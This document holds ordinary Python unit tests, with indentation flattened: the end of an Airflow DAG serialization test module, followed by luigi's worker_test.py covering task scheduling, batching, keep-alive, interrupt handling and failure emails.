from airflow.sensors.base import BaseSensorOperator
class DummySensor(BaseSensorOperator):
def poke(self, context):
return False
op = DummySensor(task_id='dummy', mode=mode, poke_interval=23)
blob = SerializedBaseOperator.serialize_operator(op)
if expect_custom_deps:
assert "deps" in blob
else:
assert "deps" not in blob
serialized_op = SerializedBaseOperator.deserialize_operator(blob)
assert op.deps == serialized_op.deps
@parameterized.expand(
[
({"on_success_callback": lambda x: print("hi")}, True),
({}, False),
]
)
def test_dag_on_success_callback_roundtrip(self, passed_success_callback, expected_value):
"""
Test that when on_success_callback is passed to the DAG, has_on_success_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_success_callback is set to True.
When the callback is not set, has_on_success_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_success_callback_roundtrip', **passed_success_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_success_callback" in serialized_dag["dag"]
else:
assert "has_on_success_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_success_callback is expected_value
@parameterized.expand(
[
({"on_failure_callback": lambda x: print("hi")}, True),
({}, False),
]
)
def test_dag_on_failure_callback_roundtrip(self, passed_failure_callback, expected_value):
"""
Test that when on_failure_callback is passed to the DAG, has_on_failure_callback is stored
in Serialized JSON blob. And when it is de-serialized dag.has_on_failure_callback is set to True.
When the callback is not set, has_on_failure_callback should not be stored in Serialized blob
and so default to False on de-serialization
"""
dag = DAG(dag_id='test_dag_on_failure_callback_roundtrip', **passed_failure_callback)
BaseOperator(task_id='simple_task', dag=dag, start_date=datetime(2019, 8, 1))
serialized_dag = SerializedDAG.to_dict(dag)
if expected_value:
assert "has_on_failure_callback" in serialized_dag["dag"]
else:
assert "has_on_failure_callback" not in serialized_dag["dag"]
deserialized_dag = SerializedDAG.from_dict(serialized_dag)
assert deserialized_dag.has_on_failure_callback is expected_value
@parameterized.expand(
[
(
['task_1', 'task_5', 'task_2', 'task_4'],
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
{'task_1', 'task_5', 'task_2', 'task_4'},
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
('task_1', 'task_5', 'task_2', 'task_4'),
['task_1', 'task_2', 'task_4', 'task_5'],
),
(
{"task3": "test3", "task2": "test2", "task1": "test1"},
{"task1": "test1", "task2": "test2", "task3": "test3"},
),
]
)
def test_serialized_objects_are_sorted(self, object_to_serialized, expected_output):
"""Test Serialized Lists, Sets and Tuples are sorted"""
serialized_obj = SerializedDAG._serialize(object_to_serialized)
if isinstance(serialized_obj, dict) and "__type" in serialized_obj:
serialized_obj = serialized_obj["__var"]
assert serialized_obj == expected_output
def test_kubernetes_optional():
"""Serialisation / deserialisation continues to work without kubernetes installed"""
def mock__import__(name, globals_=None, locals_=None, fromlist=(), level=0):
if level == 0 and name.partition('.')[0] == 'kubernetes':
raise ImportError("No module named 'kubernetes'")
return importlib.__import__(name, globals=globals_, locals=locals_, fromlist=fromlist, level=level)
with mock.patch('builtins.__import__', side_effect=mock__import__) as import_mock:
# load module from scratch, this does not replace any already imported
# airflow.serialization.serialized_objects module in sys.modules
spec = importlib.util.find_spec("airflow.serialization.serialized_objects")
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
# if we got this far, the module did not try to load kubernetes, but
# did it try to access airflow.kubernetes.*?
imported_airflow = {
c.args[0].split('.', 2)[1] for c in import_mock.call_args_list if c.args[0].startswith("airflow.")
}
assert "kubernetes" not in imported_airflow
# pod loading is not supported when kubernetes is not available
pod_override = {
'__type': 'k8s.V1Pod',
'__var': PodGenerator.serialize_pod(executor_config_pod),
}
with pytest.raises(RuntimeError):
module.BaseSerialization.from_dict(pod_override)
# basic serialization should succeed
module.SerializedDAG.to_dict(make_simple_dag()["simple_dag"])
|
worker_test.py | # -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from __future__ import print_function
import email.parser
import functools
import logging
import os
import shutil
import signal
import tempfile
import threading
import time
import psutil
from helpers import (unittest, with_config, skipOnTravis, LuigiTestCase,
temporary_unloaded_module)
import luigi.notifications
import luigi.task_register
import luigi.worker
import mock
from luigi import ExternalTask, RemoteScheduler, Task, Event
from luigi.mock import MockTarget, MockFileSystem
from luigi.scheduler import Scheduler
from luigi.worker import Worker
from luigi.rpc import RPCError
from luigi import six
from luigi.cmdline import luigi_run
luigi.notifications.DEBUG = True
class DummyTask(Task):
def __init__(self, *args, **kwargs):
super(DummyTask, self).__init__(*args, **kwargs)
self.has_run = False
def complete(self):
return self.has_run
def run(self):
logging.debug("%s - setting has_run", self)
self.has_run = True
class DynamicDummyTask(Task):
p = luigi.Parameter()
def output(self):
return luigi.LocalTarget(self.p)
def run(self):
with self.output().open('w') as f:
f.write('Done!')
time.sleep(0.5) # so we can benchmark & see if parallelization works
class DynamicDummyTaskWithNamespace(DynamicDummyTask):
task_namespace = 'banana'
class DynamicRequires(Task):
p = luigi.Parameter()
use_banana_task = luigi.BoolParameter(default=False)
def output(self):
return luigi.LocalTarget(os.path.join(self.p, 'parent'))
def run(self):
if self.use_banana_task:
task_cls = DynamicDummyTaskWithNamespace
else:
task_cls = DynamicDummyTask
dummy_targets = yield [task_cls(os.path.join(self.p, str(i)))
for i in range(5)]
dummy_targets += yield [task_cls(os.path.join(self.p, str(i)))
for i in range(5, 7)]
with self.output().open('w') as f:
for i, d in enumerate(dummy_targets):
for line in d.open('r'):
print('%d: %s' % (i, line.strip()), file=f)
class DynamicRequiresOtherModule(Task):
p = luigi.Parameter()
def output(self):
return luigi.LocalTarget(os.path.join(self.p, 'baz'))
def run(self):
import other_module
other_target_foo = yield other_module.OtherModuleTask(os.path.join(self.p, 'foo')) # NOQA
other_target_bar = yield other_module.OtherModuleTask(os.path.join(self.p, 'bar')) # NOQA
with self.output().open('w') as f:
f.write('Done!')
class DummyErrorTask(Task):
retry_index = 0
def run(self):
self.retry_index += 1
raise Exception("Retry index is %s for %s" % (self.retry_index, self.task_family))
class WorkerTest(LuigiTestCase):
def run(self, result=None):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
self.time = time.time
with Worker(scheduler=self.sch, worker_id='X') as w, Worker(scheduler=self.sch, worker_id='Y') as w2:
self.w = w
self.w2 = w2
super(WorkerTest, self).run(result)
if time.time != self.time:
time.time = self.time
def setTime(self, t):
time.time = lambda: t
def test_dep(self):
class A(Task):
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertTrue(a.has_run)
self.assertTrue(b.has_run)
def test_external_dep(self):
class A(ExternalTask):
def complete(self):
return False
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_externalized_dep(self):
class A(Task):
has_run = False
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
class B(A):
def requires(self):
return luigi.task.externalize(a)
b = B()
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_legacy_externalized_dep(self):
class A(Task):
has_run = False
def run(self):
self.has_run = True
def complete(self):
return self.has_run
a = A()
a.run = NotImplemented
class B(A):
def requires(self):
return a
b = B()
self.assertTrue(self.w.add(b))
self.assertTrue(self.w.run())
self.assertFalse(a.has_run)
self.assertFalse(b.has_run)
def test_type_error_in_tracking_run_deprecated(self):
class A(Task):
num_runs = 0
def complete(self):
return False
def run(self, tracking_url_callback=None):
self.num_runs += 1
raise TypeError('bad type')
a = A()
self.assertTrue(self.w.add(a))
self.assertFalse(self.w.run())
# Should only run and fail once, not retry because of the type error
self.assertEqual(1, a.num_runs)
def test_tracking_url(self):
tracking_url = 'http://test_url.com/'
class A(Task):
has_run = False
def complete(self):
return self.has_run
def run(self):
self.set_tracking_url(tracking_url)
self.has_run = True
a = A()
self.assertTrue(self.w.add(a))
self.assertTrue(self.w.run())
tasks = self.sch.task_list('DONE', '')
self.assertEqual(1, len(tasks))
self.assertEqual(tracking_url, tasks[a.task_id]['tracking_url'])
def test_fail(self):
class CustomException(BaseException):
def __init__(self, msg):
self.msg = msg
class A(Task):
def run(self):
self.has_run = True
raise CustomException('bad things')
def complete(self):
return self.has_run
a = A()
class B(Task):
def requires(self):
return a
def run(self):
self.has_run = True
def complete(self):
return self.has_run
b = B()
a.has_run = False
b.has_run = False
self.assertTrue(self.w.add(b))
self.assertFalse(self.w.run())
self.assertTrue(a.has_run)
self.assertFalse(b.has_run)
def test_unknown_dep(self):
# see related test_remove_dep test (grep for it)
class A(ExternalTask):
def complete(self):
return False
class C(Task):
def complete(self):
return True
def get_b(dep):
class B(Task):
def requires(self):
return dep
def run(self):
self.has_run = True
def complete(self):
return False
b = B()
b.has_run = False
return b
b_a = get_b(A())
b_c = get_b(C())
self.assertTrue(self.w.add(b_a))
# So now another worker goes in and schedules C -> B
# This should remove the dep A -> B but will screw up the first worker
self.assertTrue(self.w2.add(b_c))
self.assertFalse(self.w.run()) # should not run anything - the worker should detect that A is broken
self.assertFalse(b_a.has_run)
# not sure what should happen??
# self.w2.run() # should run B since C is fulfilled
# self.assertTrue(b_c.has_run)
def test_unfulfilled_dep(self):
class A(Task):
def complete(self):
return self.done
def run(self):
self.done = True
def get_b(a):
class B(A):
def requires(self):
return a
b = B()
b.done = False
a.done = True
return b
a = A()
b = get_b(a)
self.assertTrue(self.w.add(b))
a.done = False
self.w.run()
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_check_unfulfilled_deps_config(self):
class A(Task):
i = luigi.IntParameter()
def __init__(self, *args, **kwargs):
super(A, self).__init__(*args, **kwargs)
self.complete_count = 0
self.has_run = False
def complete(self):
self.complete_count += 1
return self.has_run
def run(self):
self.has_run = True
class B(A):
def requires(self):
return A(i=self.i)
# test the enabled features
with Worker(scheduler=self.sch, worker_id='1') as w:
w._config.check_unfulfilled_deps = True
a1 = A(i=1)
b1 = B(i=1)
self.assertTrue(w.add(b1))
self.assertEqual(a1.complete_count, 1)
self.assertEqual(b1.complete_count, 1)
w.run()
self.assertTrue(a1.complete())
self.assertTrue(b1.complete())
self.assertEqual(a1.complete_count, 3)
self.assertEqual(b1.complete_count, 2)
# test the disabled features
with Worker(scheduler=self.sch, worker_id='2') as w:
w._config.check_unfulfilled_deps = False
a2 = A(i=2)
b2 = B(i=2)
self.assertTrue(w.add(b2))
self.assertEqual(a2.complete_count, 1)
self.assertEqual(b2.complete_count, 1)
w.run()
self.assertTrue(a2.complete())
self.assertTrue(b2.complete())
self.assertEqual(a2.complete_count, 2)
self.assertEqual(b2.complete_count, 2)
def test_gets_missed_work(self):
class A(Task):
done = False
def complete(self):
return self.done
def run(self):
self.done = True
a = A()
self.assertTrue(self.w.add(a))
# simulate a missed get_work response
self.assertEqual(a.task_id, self.sch.get_work(worker='X')['task_id'])
self.assertTrue(self.w.run())
self.assertTrue(a.complete())
def test_avoid_infinite_reschedule(self):
class A(Task):
def complete(self):
return False
class B(Task):
def complete(self):
return False
def requires(self):
return A()
self.assertTrue(self.w.add(B()))
self.assertFalse(self.w.run())
def test_fails_registering_signal(self):
with mock.patch('luigi.worker.signal', spec=['signal']):
# mock will raise an attribute error getting signal.SIGUSR1
Worker()
def test_allow_reschedule_with_many_missing_deps(self):
class A(Task):
""" Task that must run twice to succeed """
i = luigi.IntParameter()
runs = 0
def complete(self):
return self.runs >= 2
def run(self):
self.runs += 1
class B(Task):
done = False
def requires(self):
return map(A, range(20))
def complete(self):
return self.done
def run(self):
self.done = True
b = B()
w = Worker(scheduler=self.sch, worker_id='X', max_reschedules=1)
self.assertTrue(w.add(b))
self.assertFalse(w.run())
# For b to be done, we must have rescheduled its dependencies to run them twice
self.assertTrue(b.complete())
self.assertTrue(all(a.complete() for a in b.deps()))
def test_interleaved_workers(self):
class A(DummyTask):
pass
a = A()
class B(DummyTask):
def requires(self):
return a
ExternalB = luigi.task.externalize(B)
b = B()
eb = ExternalB()
self.assertEqual(str(eb), "B()")
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X') as w, Worker(scheduler=sch, worker_id='Y') as w2:
self.assertTrue(w.add(b))
self.assertTrue(w2.add(eb))
logging.debug("RUNNING BROKEN WORKER")
self.assertTrue(w2.run())
self.assertFalse(a.complete())
self.assertFalse(b.complete())
logging.debug("RUNNING FUNCTIONAL WORKER")
self.assertTrue(w.run())
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_interleaved_workers2(self):
# two tasks without dependencies, one external, one not
class B(DummyTask):
pass
ExternalB = luigi.task.externalize(B)
b = B()
eb = ExternalB()
self.assertEqual(str(eb), "B()")
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X') as w, Worker(scheduler=sch, worker_id='Y') as w2:
self.assertTrue(w2.add(eb))
self.assertTrue(w.add(b))
self.assertTrue(w2.run())
self.assertFalse(b.complete())
self.assertTrue(w.run())
self.assertTrue(b.complete())
def test_interleaved_workers3(self):
class A(DummyTask):
def run(self):
logging.debug('running A')
time.sleep(0.1)
super(A, self).run()
a = A()
class B(DummyTask):
def requires(self):
return a
def run(self):
logging.debug('running B')
super(B, self).run()
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X', keep_alive=True, count_uniques=True) as w:
with Worker(scheduler=sch, worker_id='Y', keep_alive=True, count_uniques=True, wait_interval=0.1, wait_jitter=0.05) as w2:
self.assertTrue(w.add(a))
self.assertTrue(w2.add(b))
threading.Thread(target=w.run).start()
self.assertTrue(w2.run())
self.assertTrue(a.complete())
self.assertTrue(b.complete())
def test_die_for_non_unique_pending(self):
class A(DummyTask):
def run(self):
logging.debug('running A')
time.sleep(0.1)
super(A, self).run()
a = A()
class B(DummyTask):
def requires(self):
return a
def run(self):
logging.debug('running B')
super(B, self).run()
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id='X', keep_alive=True, count_uniques=True) as w:
with Worker(scheduler=sch, worker_id='Y', keep_alive=True, count_uniques=True, wait_interval=0.1, wait_jitter=0.05) as w2:
self.assertTrue(w.add(b))
self.assertTrue(w2.add(b))
self.assertEqual(w._get_work()[0], a.task_id)
self.assertTrue(w2.run())
self.assertFalse(a.complete())
self.assertFalse(b.complete())
def test_complete_exception(self):
"Tests that a task is still scheduled if its sister task crashes in the complete() method"
class A(DummyTask):
def complete(self):
raise Exception("doh")
a = A()
class C(DummyTask):
pass
c = C()
class B(DummyTask):
def requires(self):
return a, c
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as w:
self.assertFalse(w.add(b))
self.assertTrue(w.run())
self.assertFalse(b.has_run)
self.assertTrue(c.has_run)
self.assertFalse(a.has_run)
def test_requires_exception(self):
class A(DummyTask):
def requires(self):
raise Exception("doh")
a = A()
class D(DummyTask):
pass
d = D()
class C(DummyTask):
def requires(self):
return d
c = C()
class B(DummyTask):
def requires(self):
return c, a
b = B()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as w:
self.assertFalse(w.add(b))
self.assertTrue(w.run())
self.assertFalse(b.has_run)
self.assertTrue(c.has_run)
self.assertTrue(d.has_run)
self.assertFalse(a.has_run)
def test_run_csv_batch_job(self):
completed = set()
class CsvBatchJob(luigi.Task):
values = luigi.parameter.Parameter(batch_method=','.join)
has_run = False
def run(self):
completed.update(self.values.split(','))
self.has_run = True
def complete(self):
return all(value in completed for value in self.values.split(','))
tasks = [CsvBatchJob(str(i)) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertFalse(task.has_run)
def test_run_max_batch_job(self):
completed = set()
class MaxBatchJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
def run(self):
completed.add(self.value)
self.has_run = True
def complete(self):
return any(self.value <= ran for ran in completed)
tasks = [MaxBatchJob(i) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
# only task number 9 should run
self.assertFalse(task.has_run and task.value < 9)
def test_run_batch_job_unbatched(self):
completed = set()
class MaxNonBatchJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
batchable = False
def run(self):
completed.add(self.value)
self.has_run = True
def complete(self):
return self.value in completed
tasks = [MaxNonBatchJob((i,)) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertTrue(task.has_run)
def test_run_batch_job_limit_batch_size(self):
completed = set()
runs = []
class CsvLimitedBatchJob(luigi.Task):
value = luigi.parameter.Parameter(batch_method=','.join)
has_run = False
max_batch_size = 4
def run(self):
completed.update(self.value.split(','))
runs.append(self)
def complete(self):
return all(value in completed for value in self.value.split(','))
tasks = [CsvLimitedBatchJob(str(i)) for i in range(11)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertTrue(self.w.run())
for task in tasks:
self.assertTrue(task.complete())
self.assertEqual(3, len(runs))
def test_fail_max_batch_job(self):
class MaxBatchFailJob(luigi.Task):
value = luigi.IntParameter(batch_method=max)
has_run = False
def run(self):
self.has_run = True
assert False
def complete(self):
return False
tasks = [MaxBatchFailJob(i) for i in range(10)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertFalse(self.w.run())
for task in tasks:
# only task number 9 should run
self.assertFalse(task.has_run and task.value < 9)
self.assertEqual({task.task_id for task in tasks}, set(self.sch.task_list('FAILED', '')))
def test_gracefully_handle_batch_method_failure(self):
class BadBatchMethodTask(DummyTask):
priority = 10
batch_int_param = luigi.IntParameter(batch_method=int.__add__) # should be sum
bad_tasks = [BadBatchMethodTask(i) for i in range(5)]
good_tasks = [DummyTask()]
all_tasks = good_tasks + bad_tasks
self.assertFalse(any(task.complete() for task in all_tasks))
worker = Worker(scheduler=Scheduler(retry_count=1), keep_alive=True)
for task in all_tasks:
self.assertTrue(worker.add(task))
self.assertFalse(worker.run())
self.assertFalse(any(task.complete() for task in bad_tasks))
# we only get to run the good task if the bad task failures were handled gracefully
self.assertTrue(all(task.complete() for task in good_tasks))
def test_post_error_message_for_failed_batch_methods(self):
class BadBatchMethodTask(DummyTask):
batch_int_param = luigi.IntParameter(batch_method=int.__add__) # should be sum
tasks = [BadBatchMethodTask(1), BadBatchMethodTask(2)]
for task in tasks:
self.assertTrue(self.w.add(task))
self.assertFalse(self.w.run())
failed_ids = set(self.sch.task_list('FAILED', ''))
self.assertEqual({task.task_id for task in tasks}, failed_ids)
self.assertTrue(all(self.sch.fetch_error(task_id)['error'] for task_id in failed_ids))
class WorkerKeepAliveTests(LuigiTestCase):
def setUp(self):
self.sch = Scheduler()
super(WorkerKeepAliveTests, self).setUp()
def _worker_keep_alive_test(self, first_should_live, second_should_live, task_status=None, **worker_args):
worker_args.update({
'scheduler': self.sch,
'worker_processes': 0,
'wait_interval': 0.01,
'wait_jitter': 0.0,
})
w1 = Worker(worker_id='w1', **worker_args)
w2 = Worker(worker_id='w2', **worker_args)
with w1 as worker1, w2 as worker2:
worker1.add(DummyTask())
t1 = threading.Thread(target=worker1.run)
t1.start()
worker2.add(DummyTask())
t2 = threading.Thread(target=worker2.run)
t2.start()
if task_status:
self.sch.add_task(worker='DummyWorker', task_id=DummyTask().task_id, status=task_status)
# allow workers to run their get work loops a few times
time.sleep(0.1)
try:
self.assertEqual(first_should_live, t1.isAlive())
self.assertEqual(second_should_live, t2.isAlive())
finally:
# mark the task done so the worker threads will die
self.sch.add_task(worker='DummyWorker', task_id=DummyTask().task_id, status='DONE')
t1.join()
t2.join()
def test_no_keep_alive(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
)
def test_keep_alive(self):
self._worker_keep_alive_test(
first_should_live=True,
second_should_live=True,
keep_alive=True,
)
def test_keep_alive_count_uniques(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
keep_alive=True,
count_uniques=True,
)
def test_keep_alive_count_last_scheduled(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=True,
keep_alive=True,
count_last_scheduled=True,
)
def test_keep_alive_through_failure(self):
self._worker_keep_alive_test(
first_should_live=True,
second_should_live=True,
keep_alive=True,
task_status='FAILED',
)
def test_do_not_keep_alive_through_disable(self):
self._worker_keep_alive_test(
first_should_live=False,
second_should_live=False,
keep_alive=True,
task_status='DISABLED',
)
class WorkerInterruptedTest(unittest.TestCase):
def setUp(self):
self.sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
requiring_sigusr = unittest.skipUnless(hasattr(signal, 'SIGUSR1'),
'signal.SIGUSR1 not found on this system')
def _test_stop_getting_new_work(self, worker):
d = DummyTask()
with worker:
worker.add(d) # For assistant its ok that other tasks add it
self.assertFalse(d.complete())
worker.handle_interrupt(signal.SIGUSR1, None)
worker.run()
self.assertFalse(d.complete())
@requiring_sigusr
def test_stop_getting_new_work(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch))
@requiring_sigusr
def test_stop_getting_new_work_assistant(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch, keep_alive=False, assistant=True))
@requiring_sigusr
def test_stop_getting_new_work_assistant_keep_alive(self):
self._test_stop_getting_new_work(
Worker(scheduler=self.sch, keep_alive=True, assistant=True))
def test_existence_of_disabling_option(self):
# any code equivalent of `os.kill(os.getpid(), signal.SIGUSR1)`
# seem to give some sort of a "InvocationError"
Worker(no_install_shutdown_handler=True)
@with_config({"worker": {"no_install_shutdown_handler": "True"}})
def test_can_run_luigi_in_thread(self):
class A(DummyTask):
pass
task = A()
# Note that ``signal.signal(signal.SIGUSR1, fn)`` can only be called in the main thread.
# So if we do not disable the shutdown handler, this would fail.
t = threading.Thread(target=lambda: luigi.build([task], local_scheduler=True))
t.start()
t.join()
self.assertTrue(task.complete())
class WorkerDisabledTest(LuigiTestCase):
def make_sch(self):
return Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
def _test_stop_getting_new_work_build(self, sch, worker):
"""
I got motivated to create this test case when I saw that the
execution_summary crashed after my first attemted solution.
"""
class KillWorkerTask(luigi.Task):
did_actually_run = False
def run(self):
sch.disable_worker('my_worker_id')
KillWorkerTask.did_actually_run = True
class Factory(object):
def create_local_scheduler(self, *args, **kwargs):
return sch
def create_worker(self, *args, **kwargs):
return worker
luigi.build([KillWorkerTask()], worker_scheduler_factory=Factory(), local_scheduler=True)
self.assertTrue(KillWorkerTask.did_actually_run)
def _test_stop_getting_new_work_manual(self, sch, worker):
d = DummyTask()
with worker:
worker.add(d) # For assistant its ok that other tasks add it
self.assertFalse(d.complete())
sch.disable_worker('my_worker_id')
worker.run() # Note: Test could fail by hanging on this line
self.assertFalse(d.complete())
def _test_stop_getting_new_work(self, **worker_kwargs):
worker_kwargs['worker_id'] = 'my_worker_id'
sch = self.make_sch()
worker_kwargs['scheduler'] = sch
self._test_stop_getting_new_work_manual(sch, Worker(**worker_kwargs))
sch = self.make_sch()
worker_kwargs['scheduler'] = sch
self._test_stop_getting_new_work_build(sch, Worker(**worker_kwargs))
def test_stop_getting_new_work_keep_alive(self):
self._test_stop_getting_new_work(keep_alive=True, assistant=False)
def test_stop_getting_new_work_assistant(self):
self._test_stop_getting_new_work(keep_alive=False, assistant=True)
def test_stop_getting_new_work_assistant_keep_alive(self):
self._test_stop_getting_new_work(keep_alive=True, assistant=True)
class DynamicDependenciesTest(unittest.TestCase):
n_workers = 1
timeout = float('inf')
def setUp(self):
self.p = tempfile.mkdtemp()
def tearDown(self):
shutil.rmtree(self.p)
def test_dynamic_dependencies(self, use_banana_task=False):
t0 = time.time()
t = DynamicRequires(p=self.p, use_banana_task=use_banana_task)
luigi.build([t], local_scheduler=True, workers=self.n_workers)
self.assertTrue(t.complete())
# loop through output and verify
with t.output().open('r') as f:
for i in range(7):
self.assertEqual(f.readline().strip(), '%d: Done!' % i)
self.assertTrue(time.time() - t0 < self.timeout)
def test_dynamic_dependencies_with_namespace(self):
self.test_dynamic_dependencies(use_banana_task=True)
def test_dynamic_dependencies_other_module(self):
t = DynamicRequiresOtherModule(p=self.p)
luigi.build([t], local_scheduler=True, workers=self.n_workers)
self.assertTrue(t.complete())
class DynamicDependenciesWithMultipleWorkersTest(DynamicDependenciesTest):
n_workers = 100
timeout = 3.0 # We run 7 tasks that take 0.5s each so it should take less than 3.5s
class WorkerPingThreadTests(unittest.TestCase):
def test_ping_retry(self):
""" Worker ping fails once. Ping continues to try to connect to scheduler
Kind of ugly since it uses actual timing with sleep to test the thread
"""
sch = Scheduler(
retry_delay=100,
remove_delay=1000,
worker_disconnect_delay=10,
)
self._total_pings = 0 # class var so it can be accessed from fail_ping
def fail_ping(worker):
# this will be called from within keep-alive thread...
self._total_pings += 1
raise Exception("Some random exception")
sch.ping = fail_ping
with Worker(
scheduler=sch,
worker_id="foo",
ping_interval=0.01 # very short between pings to make test fast
):
# let the keep-alive thread run for a bit...
time.sleep(0.1) # yes, this is ugly but it's exactly what we need to test
self.assertTrue(
self._total_pings > 1,
msg="Didn't retry pings (%d pings performed)" % (self._total_pings,)
)
def test_ping_thread_shutdown(self):
with Worker(ping_interval=0.01) as w:
self.assertTrue(w._keep_alive_thread.is_alive())
self.assertFalse(w._keep_alive_thread.is_alive())
def email_patch(test_func, email_config=None):
EMAIL_CONFIG = {"email": {"receiver": "not-a-real-email-address-for-test-only", "force_send": "true"}}
if email_config is not None:
EMAIL_CONFIG.update(email_config)
emails = []
def mock_send_email(sender, recipients, msg):
emails.append(msg)
@with_config(EMAIL_CONFIG)
@functools.wraps(test_func)
@mock.patch('smtplib.SMTP')
def run_test(self, smtp):
smtp().sendmail.side_effect = mock_send_email
test_func(self, emails)
return run_test
def custom_email_patch(config):
return functools.partial(email_patch, email_config=config)
class WorkerEmailTest(LuigiTestCase):
def run(self, result=None):
super(WorkerEmailTest, self).setUp()
sch = Scheduler(retry_delay=100, remove_delay=1000, worker_disconnect_delay=10)
with Worker(scheduler=sch, worker_id="foo") as self.worker:
super(WorkerEmailTest, self).run(result)
@email_patch
def test_connection_error(self, emails):
sch = RemoteScheduler('http://tld.invalid:1337', connect_timeout=1)
self.waits = 0
def dummy_wait():
self.waits += 1
sch._wait = dummy_wait
class A(DummyTask):
pass
a = A()
self.assertEqual(emails, [])
with Worker(scheduler=sch) as worker:
try:
worker.add(a)
except RPCError:
self.assertEqual(self.waits, 2) # should attempt to add it 3 times
self.assertNotEqual(emails, [])
self.assertTrue(emails[0].find("Luigi: Framework error while scheduling %s" % (a,)) != -1)
else:
self.fail()
@email_patch
def test_complete_error(self, emails):
class A(DummyTask):
def complete(self):
raise Exception("b0rk")
a = A()
self.assertEqual(emails, [])
self.worker.add(a)
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.worker.run()
self.assertTrue(emails[0].find("Luigi: %s failed scheduling" % (a,)) != -1)
self.assertFalse(a.has_run)
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_complete_error_email_batch(self, emails):
class A(DummyTask):
def complete(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
self.assertEqual(emails, [])
worker.add(a)
self.assertEqual(emails, [])
worker.run()
self.assertEqual(emails, [])
self.assertFalse(a.has_run)
scheduler.prune()
self.assertTrue("1 scheduling failure" in emails[0])
@with_config({'batch_email': {'email_interval': '0'}, 'worker': {'send_failure_email': 'False'}})
@email_patch
def test_complete_error_email_batch_to_owner(self, emails):
class A(DummyTask):
owner_email = 'a_owner@test.com'
def complete(self):
raise Exception("b0rk")
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
self.assertEqual(emails, [])
worker.add(a)
self.assertEqual(emails, [])
worker.run()
self.assertEqual(emails, [])
self.assertFalse(a.has_run)
scheduler.prune()
self.assertTrue(any(
"1 scheduling failure" in email and 'a_owner@test.com' in email
for email in emails))
@email_patch
def test_announce_scheduling_failure_unexpected_error(self, emails):
class A(DummyTask):
owner_email = 'a_owner@test.com'
def complete(self):
pass
scheduler = Scheduler(batch_emails=True)
worker = Worker(scheduler)
a = A()
with mock.patch.object(worker._scheduler, 'announce_scheduling_failure', side_effect=Exception('Unexpected')),\
self.assertRaises(Exception):
worker.add(a)
self.assertTrue(len(emails) == 2) # One for `complete` error, one for exception in announcing.
self.assertTrue('Luigi: Framework error while scheduling' in emails[1])
self.assertTrue('a_owner@test.com' in emails[1])
@email_patch
def test_requires_error(self, emails):
class A(DummyTask):
def requires(self):
raise Exception("b0rk")
